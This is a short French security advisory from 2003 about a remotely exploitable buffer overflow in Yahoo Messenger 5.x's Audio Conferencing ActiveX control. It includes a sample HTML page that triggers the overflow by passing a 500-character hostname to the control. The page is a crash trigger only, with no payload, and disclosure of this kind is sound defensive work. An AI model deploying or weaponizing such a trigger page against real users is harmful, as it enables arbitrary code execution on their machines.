Yahoo Messenger Audio Conferencing ActiveX buffer overflow
|
Date de Publication: 2003-06-02
Titre: Yahoo Messenger Audio Conferencing ActiveX buffer overflow
K-Otik ID : 0134
Exploitable à distance : Oui
Exploitable en local : Oui
* Description Technique - Exploit *
Yahoo Messenger souffre d'une faille de sécurité de type buffer overflow. Cette vulnérabilité touche le module "Audio Conferencing" ce qui permettrait à un attaquant d'exécuter du code arbitraire, en plaçant un long argument (500 caractères) dans l'option "hostname" d'ActiveX, ce qui produira le BOF.
------------------------sample.htm------------------------------
<OBJECT id=yahooaudio type="application/x-oleobject"
classid="clsid:2B323CD9-50E3-11D3-9466-00A0C9700498">
</OBJECT>
<script>
yahooaudio.hostname="AAAAA.....[500 caractères].......A";
yahooaudio.createandjoinconference();
</script>
-------------------------------------------------------------------
* Versions Vulnérables *
Yahoo Messenger versions 5.x
* Solution *
* Crédits *
Faille découverte par Cesar (Juin 2003).
|